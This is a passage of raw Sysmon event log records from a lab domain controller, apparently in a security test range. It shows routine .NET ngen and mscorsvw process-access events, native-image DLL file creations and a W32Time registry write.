.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.606{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.606{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.606{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:57.528{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f54-0\System.Management.dll2021-01-18 13:48:57.528 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.997{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:58.996{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:58.981{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:58.981{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
11241100x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:58.871{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\62c-0\Microsoft.VisualBasic.dll2021-01-18 13:48:58.871 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.762{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.762{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.715{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.700{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.700{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:59.621{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1008-0\System.DirectoryServices.dll2021-01-18 13:48:59.621 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.121{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.106{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.106{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.043{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:59.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:00.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.731{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:00.731{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 